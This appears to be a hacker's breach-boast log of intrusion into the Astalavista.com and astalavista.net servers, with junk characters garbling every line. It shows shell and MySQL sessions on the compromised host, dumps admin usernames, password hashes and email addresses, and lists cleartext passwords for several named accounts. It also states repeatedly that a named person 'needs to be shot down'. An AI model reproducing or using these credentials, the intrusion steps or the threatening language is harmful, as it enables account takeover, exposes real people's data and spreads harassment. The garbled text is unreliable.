<link>http://www.astalavista.com/exploits</link>4 u+ B; }4 M% `$ |1 R
<description>All availably Exploits.</description>8 @7 m6 C% d& t6 y1 p' |
<language>en-us</language>
- M. t4 I" v( l" j" H <lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>8 d0 v% R' q/ _3 A$ y
<docs>http://blogs.law.harvard.edu/tech/rss</docs>
8 p/ ]9 N9 ?& y* v1 `- Z2 Q <generator>Astalavista.com</generator>
v; ?- l2 `+ P9 H9 h <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
* H! t2 d; j. G. P, Z3 ~1 {8 } </channel>0 r, O/ {: v- z* w6 e7 G. t3 P) ?
</rss>’;* ~, Y1 d& d9 e; o& u+ T
' H8 K* U) i6 k; z4 Y6 p3 U if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
3 b1 G5 ~5 s, H+ O/ t unlink (FULLPATH . ‘/feed/exploits.xml’);+ Q6 u0 ^. o4 A2 I4 y# @
}$ F6 e+ I0 }: M6 u% M
# r- {+ {% G% _! B8 I file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);
$ C/ Y% i7 m% h `) I m! n; z[snip]& U# x$ e, ^! A! w$ o
9 D- \# G; W! d) @
sh-3.2$ cat exploits.sh
1 o- I0 O' y9 l/ y- P, {; x, X#!/bin/sh! Y' s1 R: x7 ?! b
8 m# n. Z# ~6 P! S. U
###########################################################. R* j# I( Y# R/ Y% ?& G
# #; R% \: p/ v5 u, Q# J
# Title: milw0rm exploits adder #
* e- h+ a9 u& `; Y) @# Description: Add all milw0rm exploits to the #6 R- a: i l" S/ j; Q6 t
# Astalavista.com database #5 a$ M4 Y7 L! o4 e' w
# #* u# x! O9 F0 {- D
# Company: Astalavista Group #
( k* T6 U$ q) X& U. d# Author: Paulo M. Santos #
- W' G( m* J" k+ H& W: [+ C k0 Q# E-Mail: 链接标记paulo.santos@astalavista.ch #
5 `: d, s! u1 G& W. p, e& P% C! I# #
8 p/ w2 x) D: y0 M1 M+ m###########################################################- P( s4 I" {' j# P) O
* h- a! [& s. G: j* Y# path1 [- m# A/ f+ \: t2 ^
this_path=/home/com/public_html/modifications/cronjobs
7 o4 }, }5 }+ L2 ^1 y: n) r/ N" q( r! f) E7 v
# change directory" a8 B3 ~- ~& m1 P
cd $this_path
# K. |5 y) T3 e9 m dcd tmp/
: @5 J: U1 _4 g0 f' p* a# L% j: Q/ k6 i: f. `* m
# delete files8 |6 v! u9 o. z
rm -rf milw0rm.tar.* &0 w9 S/ g' ]( x/ B
rm -rf milw0rm/ &
5 O- v1 @" T6 X& G0 \1 g, @- m) _6 ^$ w# j1 S
# wget milw0rm paket f8 O2 a" X& k& n- \
wget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]1 E3 y2 y9 Z" [4 ?+ u6 A5 n
. Z( Y; i. \% l: w" a2 {2 z# @, U
# extract milw0rm paket
4 L4 I* N5 i- Ktar -xvf milw0rm.tar.bz22 I& R/ x1 R5 P" Z/ K: d; c
6 @+ C6 Q1 B( l
# change owner
E3 U0 }: u3 J1 v9 N; Ichown -R com .) ^4 W3 I: D, u4 z
chgrp -R com .
; @2 ^4 `" J( m% x% C) H! t5 H% f# y
$ e% C+ |6 c4 z$ W( \ X# execute php script
7 u3 j6 K+ B' ~6 e! t: h/ lcd $this_path
! y* J$ v: C7 m# }, l. x/ J8 iphp -q exploits.php
. Y5 |( t+ C |/ `5 A% ] o( k% @; g4 e8 h; K8 ?, M( k% Y6 m$ r
# delete files
/ v/ `# [0 |# n8 o) y4 R7 @rm -rf tmp/milw0rm.tar.*
4 @ i+ U$ t: r) K# s; V- ^rm -rf tmp/milw0rm/7 K0 _" T/ Z/ u5 P' t3 j
; N+ k5 s u4 p( csh-3.2$ echo “Paulo M. Santos needs to be shot down.”7 o% u& F' s7 g7 y, A$ D: t% [
Paulo M. Santos needs to be shot down.
6 ~6 V3 T1 `- D4 \6 Q* X; m7 _# K8 H# f7 B
mysql -u contrexxuser2 -p2 z0 C. s S( K
Enter password:+ f' z' V M4 |% s4 |. N9 Z2 r
Welcome to the MySQL monitor. Commands end with ; or \g.
0 y9 u5 c" L9 o7 ~! K. J) \1 yYour MySQL connection id is 2616945 T9 \# y; Y& L; q R2 r
Server version: 5.0.45-community-log MySQL Community Edition (GPL)/ T# g- O6 J3 j. S0 m
" B" K- Z$ P4 n; q2 }, a& D
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
* ]/ S# F7 k" F$ s6 f2 b7 v1 v$ s1 M0 Y
' g8 } V* e( F" F9 Hmysql> show databases;/ e# D" C s; w% x6 X0 W
+——————–+4 \* T2 A, Z2 n5 z, u
| Database |
; \. Z( G0 y4 l) q" m# d+——————–+
- Z' }" A' G4 Q* [1 c! u; o| information_schema |& E" J& ?- c0 o, Y- J
| com_contrexx2 |3 r ]: s- Q+ W' W2 h
| com_contrexx2_live |- K$ n8 j/ m6 {) I1 ^* M
| test |7 M7 R# @% d# `5 Q. W/ C& g, q
+——————–+
+ q2 p. S0 |9 S; d5 l8 Z4 rows in set (0.00 sec)
" b* c6 {8 Z+ h) G) e( g( ?
! G: `8 U6 D' Umysql> use com_contrexx2_live$ a# a; p5 |: Z/ V+ o% k: o: f
Database changed
* ~% `- k2 z. t9 \ x. Q) imysql> show tables;) V' x5 L; |9 z) t- U
+————————————————–+- j' L& r% `" K4 S, K
| Tables_in_com_contrexx2_live |# i" i& {5 c3 b5 z
+————————————————–+
" l. v- H9 g9 }7 y4 I" R, G3 o2 E+ {| cc_banner_counter |; {5 S+ S& d9 F7 X
| cc_search_counter |
2 F' N1 h" z3 S2 r, Q5 |3 C: s' G" Z% w| contrexx_access_group_dynamic_ids |& S- O+ V" i/ g# S5 Y
| contrexx_access_group_static_ids |7 ?$ x# \ ~) L2 g8 S
| contrexx_access_rel_user_group |
) A' B( s4 r9 |8 V6 x L| contrexx_access_settings |
* J' C( b4 z1 i6 @: ?| contrexx_access_user_attribute |
3 I! q8 y# T& T1 j2 k( N| contrexx_access_user_attribute_name |
0 Y1 A, K! j: ?2 r, U C7 v| contrexx_access_user_attribute_value |7 q; h- f- A% w$ p- H) A1 D
| contrexx_access_user_core_attribute |
0 B0 @, S3 o9 V9 F4 Z9 s! j% B| contrexx_access_user_groups |- ]5 r' D& N1 V- a- \4 N
| contrexx_access_user_mail |
9 c; N U/ c# U( D7 m& G/ N| contrexx_access_user_profile |& c3 A' Z6 K/ G! I! Y
| contrexx_access_user_title |0 y! g4 H# E- P( T# O2 y
| contrexx_access_user_validity |
' ]% U3 A2 M: ]( I9 n( i| contrexx_access_users |
; I8 s+ T; s9 d; ?% L| contrexx_backend_areas |9 J9 k, C; ]( A+ Y
| contrexx_backups |4 X( K# u( \+ O
| contrexx_content |
- v( j$ g% v: r. {5 H' {. e7 i| contrexx_content_history |. v' O) ^1 ]8 u
| contrexx_content_logfile |
F, C" P) D/ V, U6 i| contrexx_content_navigation |$ y0 r# w3 _* `. u- {7 E3 v
| contrexx_content_navigation_history |3 B: H, F7 L) O: P9 Z* G9 |1 D
| contrexx_ids |
' w5 [$ T( s9 W| contrexx_languages |. ?& F1 q. s3 \# M* y
| contrexx_lib_country |
, @8 W: f( \3 k7 V1 r! S p| contrexx_log |0 q6 }- _" a4 Z: L' q" U
| contrexx_module_alias_source |
Y" x. }. e v; b! H) ?8 Q| contrexx_module_alias_target |
" d7 h1 e6 Y- t# r9 u6 U| contrexx_module_block_blocks |/ [( u; W+ b% [& L
| contrexx_module_block_rel_lang |; U# [: @& ]9 P. v
| contrexx_module_block_rel_pages |
. Q8 b9 _' n! M0 Q- f& z5 e| contrexx_module_block_settings |' F; [' ]( D) g2 Z+ F. N3 f* g
| contrexx_module_blog_categories |
1 X, i0 U3 @5 P* G: P| contrexx_module_blog_comments |
t+ x# ? X8 {- T7 e| contrexx_module_blog_message_to_category |2 P8 k! I5 f! h0 p9 Z% ^& T S! Z9 [
| contrexx_module_blog_messages |- C$ |6 V0 F$ i) K6 K8 [+ K& {
| contrexx_module_blog_messages_lang |
) q3 d( s, w0 |* k' _8 ]5 Q| contrexx_module_blog_networks |
, |* [7 O& {9 ] c| contrexx_module_blog_networks_lang |
* n! h6 ]! `; C% R" b( _8 {- ?| contrexx_module_blog_settings |
4 I/ i& g. q( r$ w* c| contrexx_module_blog_votes |1 r1 m4 M+ ^5 Z' t; x, j5 s! W
| contrexx_module_calendar |( w$ c, z) n" t( u: Y
| contrexx_module_calendar_access |
0 R- `; i2 r: L/ \| contrexx_module_calendar_categories |
1 e$ a0 w/ x+ q8 e6 j# A| contrexx_module_calendar_form_data |4 F$ Z' N/ j/ n% R% E, O8 d, g
| contrexx_module_calendar_form_fields |
( t+ x( m: c o* a% v7 R| contrexx_module_calendar_registrations |
* ^; @6 |- L2 b! c4 |5 _* ~| contrexx_module_calendar_settings |
5 g8 U6 @2 r+ t3 y% v& E| contrexx_module_calendar_style |# S9 J, j+ j. O% _: {) B6 }
| contrexx_module_contact_form |
3 y2 c; ^2 f9 Z' W& d: q| contrexx_module_contact_form_data |" _& H1 m! W/ S' j- Q, {
| contrexx_module_contact_form_field |
2 Q0 G% c: g* o3 Q| contrexx_module_contact_settings |
' f* o8 I @& u6 ]| contrexx_module_data_categories |$ a2 n& s* _8 `( c
| contrexx_module_data_message_to_category |3 y: u. S* F7 d5 ~3 e
| contrexx_module_data_messages |
* T$ m. {2 _- d3 J| contrexx_module_data_messages_lang |
# ~9 N" k- }: p1 E& k6 r% T| contrexx_module_data_placeholders |
9 b/ x! |: [! n# i% y- O: x| contrexx_module_data_settings |
% t3 B( \" j3 y9 v| contrexx_module_directory_access |
0 ]) |2 _4 \) ~0 R8 x$ z7 k| contrexx_module_directory_categories |7 p% g! \9 i4 e1 t1 \
| contrexx_module_directory_dir |
+ z) m& d" c$ u) ?- o/ a. L& x; Y| contrexx_module_directory_inputfields |0 g8 _2 m$ u9 h: |( S/ l
| contrexx_module_directory_levels |
" r2 A+ }! e0 a$ y2 O$ K. q| contrexx_module_directory_mail |# q/ G7 ?( p, n1 E% m# D" }
| contrexx_module_directory_rel_dir_cat |
+ B$ l( A$ n) `6 C' P| contrexx_module_directory_rel_dir_level |
( q* b. e z3 }& e5 I| contrexx_module_directory_settings |' e3 a8 V y. N: r4 }6 \5 X2 t+ u5 J
| contrexx_module_directory_settings_google |
1 Q( H# v* Q; l, a1 X$ F$ E| contrexx_module_directory_vote |
0 W2 \8 Y4 q" T$ {, u0 v| contrexx_module_docsys |
' e- c, G% v/ g: F% U" ~| contrexx_module_docsys_categories |, b7 Z5 Q* o" Y8 M/ s
| contrexx_module_egov_configuration |
6 B) Q# h' I& K( c| contrexx_module_egov_orders |
( b8 S& `5 c% E- ?| contrexx_module_egov_product_calendar |
' W! ?) }. f9 E| contrexx_module_egov_product_fields |
F0 {% k2 @: E' A6 i| contrexx_module_egov_products |6 G! r1 v; G O
| contrexx_module_egov_settings |( ~/ T$ N; \( b
| contrexx_module_exploits |
! v3 e! C8 P; N% q( @| contrexx_module_exploits_categories |# d6 ]+ m" i. A! b( _) ~
| contrexx_module_feed_category |
9 ?' ~1 a+ e, i ?" w4 v| contrexx_module_feed_news |
o4 Z! h9 f2 r) ~, U| contrexx_module_feed_newsml_association |
8 n: h$ A! s3 G0 Y4 K$ Z1 Z3 U s| contrexx_module_feed_newsml_categories |6 @9 P. i! D/ U+ I1 Q: Z* a |5 D9 A
| contrexx_module_feed_newsml_documents |
D; W, L: i' ?% A! K" v| contrexx_module_feed_newsml_providers |
; ]/ |; }& U! U+ f5 u Y$ j9 H| contrexx_module_forum_access |
% C) l2 |; p: S; B% I5 q| contrexx_module_forum_categories |' _9 S( `$ F2 s A3 C# o, N6 V
| contrexx_module_forum_categories_lang | ~3 g' p1 l1 M' \1 F, f5 h( l, K/ o
| contrexx_module_forum_notification |
4 M) C- e" W' l| contrexx_module_forum_postings |
9 p- E0 ^* `7 i H| contrexx_module_forum_rating |
* P+ ]# I2 I( E$ x Y2 y+ O| contrexx_module_forum_settings |9 f$ u2 c3 K' V$ U
| contrexx_module_forum_statistics |
& l7 {3 y6 |3 B| contrexx_module_gallery_categories |# s {3 I' r2 J1 M( m: M8 v
| contrexx_module_gallery_comments |
6 W: T8 @: @; m. G) V' Z5 A3 h& J/ T| contrexx_module_gallery_language |
$ G+ P0 b/ V j0 v| contrexx_module_gallery_language_pics |
0 D% v* T$ |5 V) `6 ^" S| contrexx_module_gallery_pictures |2 h, U7 g+ O; x9 [: h) V$ V( y
| contrexx_module_gallery_settings |; b$ w6 V" e' _9 ]( ^
| contrexx_module_gallery_votes |+ R' N" E. M0 L; L
| contrexx_module_guestbook |
5 C- M# _ B- D7 ?" b| contrexx_module_guestbook_settings |& V: J. Z6 A! j
| contrexx_module_livecam |; W) E) k" j! C6 z) G$ u) t+ Q
| contrexx_module_livecam_settings |2 N& O* x% }9 B' C W' g' P5 z; l
| contrexx_module_market |
. w% k# x9 t. ]9 K$ q. P| contrexx_module_market_access |
, w. e* f8 d' k4 B. w( u| contrexx_module_market_categories |" M" s7 O/ Y- h& f7 r& S- h
| contrexx_module_market_mail |7 y2 d4 }9 W/ s2 ^+ P. A: j
| contrexx_module_market_paypal |" h Z1 F% g) z% A" I
| contrexx_module_market_settings |
8 v; D7 o3 j/ `0 B| contrexx_module_market_spez_fields |1 ?6 P2 f) ^! j+ T0 F
| contrexx_module_mediadir_access |
5 I- `1 C% _' n$ s. J| contrexx_module_mediadir_categories |
( j9 K8 ~, _" L| contrexx_module_mediadir_comments |! D. q6 B7 P: R, s0 q- u9 a
| contrexx_module_mediadir_dir |5 m% |6 Q2 Y0 x: T+ b+ m2 `
| contrexx_module_mediadir_inputfields |
4 }3 x J( B* _+ R/ S6 X* T| contrexx_module_mediadir_levels |6 h+ ^8 d# i/ w2 X9 p+ P# Q0 K3 R
| contrexx_module_mediadir_mail |8 c' W! K- R$ T" p
| contrexx_module_mediadir_rel_dir_cat |( f! C4 L/ K5 F) k# ^7 f
| contrexx_module_mediadir_rel_dir_level |9 ?: b, k* Z8 K( h2 r2 o3 R/ d& N
| contrexx_module_mediadir_reports |
% P. d: ~3 f @| contrexx_module_mediadir_settings |
# M* ?" v5 \- e4 y8 q| contrexx_module_mediadir_settings_google |
, h/ O3 [; F7 C I9 `# o| contrexx_module_mediadir_vote |
; \) A6 H8 j4 Q| contrexx_module_memberdir_directories |7 i T% Y* n$ D2 Z$ f* f% \4 x
| contrexx_module_memberdir_name |
5 ~6 J: l3 o% B# Y ]3 ~) X6 [| contrexx_module_memberdir_settings |6 T" ]' [4 p" X3 o7 Y
| contrexx_module_memberdir_values |& k" ?+ H: [/ U7 l
| contrexx_module_nettools_allowed_groups |
; G% Q' h5 Y3 K/ {" I: Q| contrexx_module_nettools_settings |
+ K8 T2 V" R2 F5 x| contrexx_module_news |: V1 d7 u4 u* v* U2 Z b1 c
| contrexx_module_news_access |2 ~) x6 e y+ e4 Z$ v( Y6 S' K
| contrexx_module_news_categories |! B6 H% Y: r* X- l a0 v3 Z/ C
| contrexx_module_news_settings |
; b% m I* Y, J n8 ]* w: J| contrexx_module_news_teaser_frame |
. I% {9 n7 J7 ~0 ?& l+ V; l| contrexx_module_news_teaser_frame_templates |
0 X% h1 a. I [, c6 C. A& z9 t+ ^# M| contrexx_module_news_ticker |7 S( u1 U+ }- {; h
| contrexx_module_newsletter |
8 H( t2 Y- {# s# _| contrexx_module_newsletter_attachment |
7 t9 q1 W" Y# n9 ~0 ^" e0 ?# [| contrexx_module_newsletter_category |
3 n& U/ T. V- a6 P/ H' @) p| contrexx_module_newsletter_confirm_mail |3 m5 L* B8 ~# f; J
| contrexx_module_newsletter_rel_cat_news |
6 }# }2 j& l# G: M5 Y' ?" @| contrexx_module_newsletter_rel_user_cat |
0 M3 \8 ]; b/ T| contrexx_module_newsletter_settings |
4 T+ w2 d {0 N1 g* L& A4 ?| contrexx_module_newsletter_template |
+ f% P" z, h9 v; c3 l+ e8 ~, I1 @| contrexx_module_newsletter_tmp_sending |
% {" }6 M; } j, j5 z3 t| contrexx_module_newsletter_user |
2 I1 J" r; {) ^+ }/ S| contrexx_module_newsletter_user_title |; I$ k% f/ v7 ~# ]8 J4 {* w0 k! Y
| contrexx_module_onlinetools_defaultports |. g* [ N. f& ?3 K: J3 l
| contrexx_module_onlinetools_defaultports_back |
# z& b8 j/ i$ f0 j$ U| contrexx_module_onlinetools_geolitecity_blocks |$ q% E' u3 p+ v! Z' S3 ?8 P
| contrexx_module_onlinetools_geolitecity_country |
, E- ~1 ?3 i& Q| contrexx_module_onlinetools_geolitecity_location |
# a7 {- X `) q* F9 A* {& D| contrexx_module_podcast_category |
8 J- ]6 ~1 v, i8 K: b9 O0 a1 s7 W: e| contrexx_module_podcast_medium |& y8 G& g4 G" @2 {
| contrexx_module_podcast_rel_category_lang |
9 Q! y, N0 J5 Q+ U+ [| contrexx_module_podcast_rel_medium_category |
9 k( D4 g/ |8 a: W: f1 q2 F| contrexx_module_podcast_settings |
/ @, J, v* p6 r' |* G| contrexx_module_podcast_template |. m1 k8 D$ a& h
| contrexx_module_proxydb |4 \+ q. F9 c# f+ Y9 N5 `+ z' |
| contrexx_module_recommend |+ J4 E" M7 \8 |+ a9 S
| contrexx_module_repository |! r5 A: T/ j6 R2 s, n7 O
| contrexx_module_securitynews_cats |/ c! U& E0 g3 p2 K" r
| contrexx_module_securitynews_feeds |6 `( K& _6 l% A/ t% n
| contrexx_module_securitynews_news |
0 F" @( W$ I# {/ J) w* s& l| contrexx_module_shop_categories |
: s' f$ w8 J" T| contrexx_module_shop_config |
! S3 s: g4 B+ u; ?, ]/ h7 E: P| contrexx_module_shop_countries |
3 b- u! t( P+ E1 i8 y) R| contrexx_module_shop_currencies |& |2 I3 j) Z( j" E4 m- X
| contrexx_module_shop_customers |
' {5 m! G; ?+ k; p* _, v' || contrexx_module_shop_importimg |
. y% @. j! R9 B j; G7 w% v| contrexx_module_shop_lsv |
: h( C* x/ y$ r: c3 Q| contrexx_module_shop_mail |0 F1 ~! M( t& w5 n+ \6 [
| contrexx_module_shop_mail_content |
1 C6 h* N6 @1 [5 }" [" e; b% f! A| contrexx_module_shop_manufacturer |
- T% Q) K& e7 B| contrexx_module_shop_order_items |9 M" T& G4 C/ X3 |8 p9 U$ R
| contrexx_module_shop_order_items_attributes |( x3 t: e$ S. z( n- I
| contrexx_module_shop_orders |4 @) [0 A7 |- o9 w9 V, [
| contrexx_module_shop_payment |
. h/ z8 i$ x- T| contrexx_module_shop_payment_processors | l9 X1 O0 ^. g4 k1 \+ [+ n) J
| contrexx_module_shop_pricelists |3 [( Y8 s' ^3 Q7 ^: M& z8 q- z+ K) j
| contrexx_module_shop_products |1 s5 v- p7 ]5 s% O9 L0 l l
| contrexx_module_shop_products_attributes |% Z f+ u0 H, J
| contrexx_module_shop_products_attributes_name |
. \$ Z0 V5 Y9 j. `, {! j$ n) f| contrexx_module_shop_products_attributes_value | E+ C. r* }0 f& ^' D
| contrexx_module_shop_products_downloads |& L1 ] G" @2 F( w7 a6 I% } @1 J
| contrexx_module_shop_rel_countries |" }9 X+ A& c# K1 f, {$ V% L. H
| contrexx_module_shop_rel_payment |3 P/ y4 `' S# Z- M- J
| contrexx_module_shop_rel_shipment |
& ^# p! W8 h( {7 D; z& s7 t) d| contrexx_module_shop_shipment_cost |
j2 D8 H# T; L7 o| contrexx_module_shop_shipper |; z1 P, h( y+ q6 h
| contrexx_module_shop_vat |
7 N7 q: }) l) a- o9 x| contrexx_module_shop_zones |
* Y* c8 j8 b0 V, W% i| contrexx_module_u2u_address_list |; P9 T/ a- {2 \3 h; F
| contrexx_module_u2u_message_log |
# @ S6 R5 D- Z% g| contrexx_module_u2u_sent_messages |1 K: s' v% y/ v5 p4 A
| contrexx_module_u2u_settings |
' d6 ^0 \' I- l* s4 r| contrexx_module_u2u_user_log |
1 v1 O m5 G0 ]. u9 Z: O! w2 I| contrexx_modules |
# ^& o v3 p& g0 k2 k$ H| contrexx_sessions |# s* [+ {& x+ [* }& T. C" w
| contrexx_settings |
% Q: V" R$ e. l. k4 G) \$ V| contrexx_settings_smtp |
, y0 }- ~4 Z( k0 F3 a) r& i* P| contrexx_skins |
. _$ ]' f/ e" J O0 x4 @| contrexx_stats_browser |" @% r) } R$ M5 k9 t! a
| contrexx_stats_colourdepth |8 [: l f! y9 |" y/ g. }
| contrexx_stats_config |
9 J/ M. ?! b X4 b% K$ k% a| contrexx_stats_country |$ \3 m- y! n/ I/ U& Y
| contrexx_stats_hostname |) O- e: T O: n* d. }
| contrexx_stats_javascript |0 y! G* c5 A" ?9 i) u9 t
| contrexx_stats_operatingsystem |# j: {& O* S' @( f$ j
| contrexx_stats_referer |" n w+ c5 U. X7 r
| contrexx_stats_requests |
3 z7 r9 m" O; ~* i) j| contrexx_stats_requests_summary |
" s5 a& p$ N; ^: a- l( v/ Z+ U0 v| contrexx_stats_screenresolution |* A, G* L) n. c [" M: O
| contrexx_stats_search |
5 s1 f( l3 z7 b" ~| contrexx_stats_spiders |
" |% z" X1 H5 G9 ^$ L# y| contrexx_stats_spiders_summary |
: B3 {9 H2 u1 v- I; h7 d% p| contrexx_stats_visitors |
, Y4 q6 p& M& d: F& P| contrexx_stats_visitors_summary |$ O6 V5 e. k G0 v) o
| contrexx_voting_additionaldata |
- ^% X# V) @) n. V+ v| contrexx_voting_email |8 j' F' o0 O' n4 J$ S3 G9 j
| contrexx_voting_rel_email_system |
% e) I, u$ `7 q| contrexx_voting_results |5 ^- v5 b, }9 P
| contrexx_voting_system |
) V! A- [/ @9 j) l' m| foo |
1 P. K7 }* w" @ i# b+————————————————–+
. ], Q2 S: S- j8 e' Y0 p227 rows in set (0.01 sec)9 U$ p8 w/ v* P
9 R6 `- W2 V. T/ Y, m6 b6 Vmysql> select count(*) as skids from contrexx_access_users;' u, S" E3 f! D7 c% E, D7 d
+——-+
; }7 z& `2 C0 s0 g E/ i| skids |
0 \5 S9 E+ G3 X9 B5 X+——-+
' z s8 a3 \( h# H( B| 53699 |
/ q7 U4 K% e, Y, U8 I7 \* ^! \+——-+
. E: R- Y1 S. H) i1 H+ \1 row in set (0.00 sec)
- R2 D5 A" Z0 U
, m5 j& E/ }0 |3 e4 hmysql> describe contrexx_access_users;# t* i9 Z* Q& l6 }; j& ]
+——————+——————————————+——+—–+————–+—————-+' a2 J: ~0 R/ ~: q( @* m
| Field | Type | Null | Key | Default | Extra |, D7 U* i7 p3 m# c! W& |
+——————+——————————————+——+—–+————–+—————-+
* w0 g7 S, m1 b5 |% s4 p| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
) m$ t: _# T. ~& O2 e9 I6 s| is_admin | tinyint(1) unsigned | NO | | 0 | |) M3 x+ ^) d2 ^" x* M4 C& [, O/ J# T
| username | varchar(40) | YES | MUL | NULL | |$ A, G$ W- |* C+ Z
| password | varchar(32) | YES | | NULL | |6 T4 ]1 C f& s$ ?4 I
| regdate | int(14) unsigned | NO | | 0 | |
0 ]. `: ?! ?' k: `2 h| expiration | int(14) unsigned | NO | | 0 | |- R' }" ^7 y: ^$ N# {! J/ \" K
| validity | int(10) unsigned | NO | | 0 | |0 ^" a1 q, [' W7 ]
| last_auth | int(14) unsigned | NO | | 0 | |" N) Y$ C: Y1 ~( ]+ ~
| last_activity | int(14) unsigned | NO | | 0 | |. O/ j' ]& ~& j: {. n( \- ]
| email | varchar(255) | YES | | NULL | |- U6 Q/ R' N$ I
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |; Q( U0 T$ V3 O7 G" P( X6 e
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
' R8 o& O; {2 Z! p5 e+ n| backend_lang_id | int(2) unsigned | NO | | 0 | |0 f8 F. }' ?2 {5 b6 O& g4 g/ ^
| active | tinyint(1) | NO | | 0 | |
: r/ c6 O, v6 F2 w! W' K| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |, O- p/ C8 y: o# n
| restore_key | varchar(32) | NO | | | |
/ u$ [1 H& H0 O8 F8 e! _8 W| restore_key_time | int(14) unsigned | NO | | 0 | |
4 O, W9 K5 n' y# [& q/ o& g| u2u_active | enum(’0′,’1′) | NO | | 1 | |
1 C) `: H8 z9 Q! m+——————+——————————————+——+—–+————–+—————-+6 F! f- x; y9 B
18 rows in set (0.00 sec). ?# C5 x2 f9 X" g4 X: t
3 R ?, M2 W+ h' b4 U! `
mysql> select username,password,email from contrexx_access_users where is_admin = 1;4 i/ _- H2 J' ?* J. Z
+————+———————————-+—————————–+
3 C% b# ?6 U; T5 g, t| username | password | email |$ e4 U P2 K/ G$ a# O7 ^
+————+———————————-+—————————–+ x# \; C. b5 i/ U7 _& l& M
| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
f: e5 b% E4 W| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
( u: x! C e* O| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |3 G/ C- E. p. I7 J
| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |% P) k7 V$ W+ H, V( C, k6 B
+————+———————————-+—————————–+* g6 ^5 h, r! D1 k. S6 ^' N
4 rows in set (0.04 sec)% H) j/ u- w! ^, `; P
( }' q- V4 ` a0 ?, @+ T6 s8 ?mysql> exit;
9 F) u2 S8 J9 [5 B- c g8 MBye* N# R S4 ]" W% Z
% B i }5 [( y& l/ h7 Y[~] There you go, your “team of security and IT professionals” is a joke.
* I2 @7 v7 P, B1 P7 O, ^6 |
+ m( Q9 Z3 G6 D h. ^$ S5 k9 E+——————————+
/ M7 a' P! q/ q+ d2 L Osystem:f82BN3+_*
: g8 v+ u3 ?7 |* R! iBe1er0ph0r:belerophor4astacom
% k4 H" u2 Q- u: r: Oprozac:asta4cms!6 C+ X( E( r5 a
commander:mpbdaagf6m' L% q6 W9 ~6 T8 L: a0 }5 j' W
sykadul:ak29eral& @/ b* \7 t- N4 P
+——————————++ U: @$ _3 B, E. i) J' e1 l8 A
1 o$ k( a+ \0 T" [+ P$ c8 z/ j, M[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s)$ B) N0 T2 \' ]3 Q7 I( M3 Z% n
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.3 E/ Y" ~2 f0 P" V2 d. \
4 X+ Y8 m; `# h) K8 o! a
[~] Lets move to astalavista.net now,2 G( i& v1 F* u( ?2 B
0 l. @8 @ k! g3 qFrom <链接标记[url]https://www.astalavista.net/[/url]>:
. W Q4 F3 m" ~$ s>> Everyone knows that the best defense is a good offense.
1 L. a) C: `, e" w+ H# t& n( f>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.
, {7 j+ ?! V* d- u9 Y+ N4 l9 p>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.
6 Y' M- @6 |/ B5 R1 h>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”% K1 u, n- e- t& n' A7 `" t) v
! C; Z7 w, D6 w7 _- h; u>> Go ahead, try and hack our server . in a completely legal way!; c2 M; C [0 N1 \9 N+ T1 i+ m7 d
>> Learn by doing: We offer our members tricky tasks and challenges on an8 H4 \9 r# ^( r" P) q& m5 P! n+ j) P$ n
>> ongoing basis so you can test your knowledge and abilities. You can also+ t1 \0 k' q2 M! B9 i8 l
>> demonstrate what you.ve mastered by taking part in regular hacker contests
( S7 |1 a- Q! ^/ R>> and war games$ {' e+ h1 G3 C8 w
4 z% t" b# | j' ~/ }- z+ K: v0 w# i
[~] Lets take a look there, after all… they are hack-proof, aren’t they?!
% x0 \5 S' ]+ a% C0 s4 h1 f# B, g) y! p, ^7 [; \
[-] Tricky task: Find home dir of astalavista.net
! |4 j$ {4 O' z3 Z
0 {9 Q4 G" N7 p7 Qsh-3.2$ ls -la ~astanet
T" m: O6 N5 S, |4 B/ }( Qtotal 48
* q/ u- W! W( d& v( Z6 q' e9 ldrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .
# `) a( a, g" V3 j- m @) Q4 h* Ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! _& S; _" ?6 U+ i+ j- @drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth6 ]8 q& O" Z1 t8 z( _8 y& Y; L
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ [5 N" M8 b8 \* X: N: |-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
( t( p3 S) u O0 n( ]. L& D-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
& X) d8 S5 C% A* A- b, P+ |2 s-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc7 _ ~. B t! u: R) a
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains' b& V# A. ^" G) C
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap. _( B' _- l$ Y g
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
& P2 @: ^$ {" f; }1 p6 B# mlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html' S) P; L: f+ u! V
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
0 ~3 i2 `) W; q. D0 m
7 B6 J. g1 c- k3 C5 k) gsh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/6 r w2 m6 M0 D; ^: M
sh-3.2$ ls -la) z9 k4 L, O; s) x5 u2 L
total 2005 O; l* }" r' U. L$ A/ u9 t- Z
